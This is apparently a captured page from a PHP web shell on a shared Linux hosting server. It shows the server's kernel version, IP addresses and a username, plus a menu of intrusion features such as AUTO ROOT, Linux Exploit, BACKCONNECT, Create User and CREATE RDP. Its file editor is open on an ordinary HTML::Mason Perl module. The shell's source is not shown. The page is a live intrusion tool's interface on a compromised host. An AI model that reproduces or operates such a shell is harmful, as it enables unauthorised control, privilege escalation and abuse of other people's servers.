Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
HTML /
Mason /
Apache /
[ HOME SHELL ]
Name
Size
Permission
Action
Request.pm
742
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Request.pm
# -*- cperl-indent-level: 4; cperl-continued-brace-offset: -4; cperl-continued-statement-offset: 4 -*- # Copyright (c) 1998-2005 by Jonathan Swartz. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. package HTML::Mason::Apache::Request; $HTML::Mason::Apache::Request::VERSION = '1.59'; use strict; use warnings; use base 'Apache::Request'; sub new { my $class = shift; my $r = Apache::Request->instance(shift); return bless { r => $r }, $class; } sub send_http_header { my $self = shift; return if $self->notes('sent_http_header'); $self->SUPER::send_http_header(@_); $self->notes( 'sent_http_header' => 1 ); } 1;
Close